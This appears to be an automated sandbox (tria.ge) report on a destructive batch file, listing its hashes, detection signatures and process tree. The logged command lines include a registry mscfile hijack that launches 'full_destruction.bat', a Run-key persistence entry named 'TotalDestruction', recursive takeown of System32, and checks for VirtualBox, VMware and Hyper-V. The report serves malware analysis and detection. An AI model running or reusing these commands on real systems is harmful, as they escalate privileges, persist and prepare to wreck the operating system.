Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
146s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
08/09/2024, 06:47
Static task
static1
Behavioral task
behavioral1
Sample
custom.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
custom.bat
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
custom.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
custom.bat
Resource
win11-20240802-en
General
-
Target
custom.bat
-
Size
4KB
-
MD5
1c63745d54962d205bb3ae879bea1ed4
-
SHA1
a832c894a4e2b6d486c48b9ea6ec79d94df9537e
-
SHA256
396ea933ebc00327d2ea983206ccd2a832999c28a7df070000fe9874890b5a0e
-
SHA512
129d73d0fd5967b232c54d50bc94ed171dd2ee5da2222b18bd350b42808799575a3a726c7b0b46b65d2717d025b9ebeb424a834f42540daf8308be3171a4af39
-
SSDEEP
96:NQN1Vh0eAwx86mwCVHVsOvx8vXSu7eQ/GdZj/BawH6im7BFVPhGHixL:NOueA8CVHiOvx8vC0emG7LBawH6/Yix
Malware Config
Signatures
-
Modifies file permissions 1 TTPs 2 IoCs
pid Process 288 takeown.exe 2036 takeown.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\TotalDestruction = "C:\\Users\\Admin\\AppData\\Local\\Temp\\custom.bat" reg.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1300 tasklist.exe 1328 tasklist.exe -
pid Process 2712 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 2 IoCs
pid Process 108 timeout.exe 1756 timeout.exe -
Gathers system information 1 TTPs 3 IoCs
Runs systeminfo.exe.
pid Process 1768 systeminfo.exe 560 systeminfo.exe 684 systeminfo.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile reg.exe Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\full_destruction.bat" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell\open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_CLASSES\mscfile\shell reg.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2712 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2712 powershell.exe Token: SeTakeOwnershipPrivilege 288 takeown.exe Token: SeDebugPrivilege 1300 tasklist.exe Token: SeDebugPrivilege 1328 tasklist.exe Token: SeTakeOwnershipPrivilege 2036 takeown.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 2080 wrote to memory of 2692 2080 cmd.exe 31 PID 2080 wrote to memory of 2692 2080 cmd.exe 31 PID 2080 wrote to memory of 2692 2080 cmd.exe 31 PID 2080 wrote to memory of 2712 2080 cmd.exe 32 PID 2080 wrote to memory of 2712 2080 cmd.exe 32 PID 2080 wrote to memory of 2712 2080 cmd.exe 32 PID 2080 wrote to memory of 108 2080 cmd.exe 34 PID 2080 wrote to memory of 108 2080 cmd.exe 34 PID 2080 wrote to memory of 108 2080 cmd.exe 34 PID 2080 wrote to memory of 2060 2080 cmd.exe 35 PID 2080 wrote to memory of 2060 2080 cmd.exe 35 PID 2080 wrote to memory of 2060 2080 cmd.exe 35 PID 2080 wrote to memory of 568 2080 cmd.exe 36 PID 2080 wrote to memory of 568 2080 cmd.exe 36 PID 2080 wrote to memory of 568 2080 cmd.exe 36 PID 2080 wrote to memory of 1756 2080 cmd.exe 37 PID 2080 wrote to memory of 1756 2080 cmd.exe 37 PID 2080 wrote to memory of 1756 2080 cmd.exe 37 PID 568 wrote to memory of 288 568 cmd.exe 39 PID 568 wrote to memory of 288 568 cmd.exe 39 PID 568 wrote to memory of 288 568 cmd.exe 39 PID 2080 wrote to memory of 2332 2080 cmd.exe 40 PID 2080 wrote to memory of 2332 2080 cmd.exe 40 PID 2080 wrote to memory of 2332 2080 cmd.exe 40 PID 2080 wrote to memory of 684 2080 cmd.exe 41 PID 2080 wrote to memory of 684 2080 cmd.exe 41 PID 2080 wrote to memory of 684 2080 cmd.exe 41 PID 2080 wrote to memory of 1912 2080 cmd.exe 42 PID 2080 wrote to memory of 1912 2080 cmd.exe 42 PID 2080 wrote to memory of 1912 2080 cmd.exe 42 PID 2080 wrote to memory of 1768 2080 cmd.exe 45 PID 2080 wrote to memory of 1768 2080 cmd.exe 45 PID 2080 wrote to memory of 1768 2080 cmd.exe 45 PID 2080 wrote to memory of 908 2080 cmd.exe 46 PID 2080 wrote to memory of 908 2080 cmd.exe 46 PID 2080 wrote to memory of 908 2080 cmd.exe 46 PID 2080 wrote to memory of 560 2080 cmd.exe 47 PID 2080 wrote to memory of 560 2080 cmd.exe 47 PID 2080 wrote to memory of 560 2080 cmd.exe 47 PID 2080 wrote to memory of 1836 2080 cmd.exe 48 PID 2080 wrote to memory of 1836 2080 cmd.exe 48 PID 2080 wrote to memory of 1836 2080 cmd.exe 48 PID 2080 wrote to memory of 1300 2080 cmd.exe 49 PID 2080 wrote to memory of 1300 2080 cmd.exe 49 PID 2080 wrote to memory of 1300 2080 cmd.exe 49 PID 2080 wrote to memory of 2416 2080 cmd.exe 50 PID 2080 wrote to memory of 2416 2080 cmd.exe 50 PID 2080 wrote to memory of 2416 2080 cmd.exe 50 PID 2080 wrote to memory of 1328 2080 cmd.exe 51 PID 2080 wrote to memory of 1328 2080 cmd.exe 51 PID 2080 wrote to memory of 1328 2080 cmd.exe 51 PID 2080 wrote to memory of 1084 2080 cmd.exe 52 PID 2080 wrote to memory of 1084 2080 cmd.exe 52 PID 2080 wrote to memory of 1084 2080 cmd.exe 52 PID 2080 wrote to memory of 1772 2080 cmd.exe 53 PID 2080 wrote to memory of 1772 2080 cmd.exe 53 PID 2080 wrote to memory of 1772 2080 cmd.exe 53 PID 2080 wrote to memory of 2036 2080 cmd.exe 54 PID 2080 wrote to memory of 2036 2080 cmd.exe 54 PID 2080 wrote to memory of 2036 2080 cmd.exe 54
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\custom.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Windows\system32\mode.commode con: cols=800 lines=602⤵PID:2692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wshell = New-Object -ComObject wscript.shell; $wshell.SendKeys('{F11}')"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:108
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Classes\mscfile\shell\open\command" /d "C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" /f2⤵
- Modifies registry class
PID:2060
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\full_destruction.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:288
-
-
-
C:\Windows\system32\timeout.exetimeout /t 52⤵
- Delays execution with timeout.exe
PID:1756
-
-
C:\Windows\system32\reg.exereg delete "HKCU\Software\Classes\mscfile" /f2⤵
- Modifies registry class
PID:2332
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:684
-
-
C:\Windows\system32\findstr.exefindstr /i "VirtualBox"2⤵PID:1912
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:1768
-
-
C:\Windows\system32\findstr.exefindstr /i "VMware"2⤵PID:908
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:560
-
-
C:\Windows\system32\findstr.exefindstr /i "Hyper-V"2⤵PID:1836
-
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1300
-
-
C:\Windows\system32\findstr.exefindstr /i "vmsrvc.exe"2⤵PID:2416
-
-
C:\Windows\system32\tasklist.exetasklist2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1328
-
-
C:\Windows\system32\findstr.exefindstr /i "VBoxService.exe"2⤵PID:1084
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "TotalDestruction" /d "C:\Users\Admin\AppData\Local\Temp\custom.bat" /f2⤵
- Adds Run key to start application
PID:1772
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\* /r /d y2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
285B
MD54577f08330df24a350ff523ec87bf38e
SHA15bd1a1b1b8ca3b007102a75f7abaf72348955cf2
SHA2565ef497b0848b259cbfdeb4057846d9a0f3907ec77aabe44219462ac6160bacae
SHA512ed614d6c11981ac9b1aaee0455f4d1b07dce08c0e04fb9f78ad3a7c57db0ecd8e9e0fe21292e599b4963acc8bb66e8db88759fd5fd5fee94df4d3f75cab736c2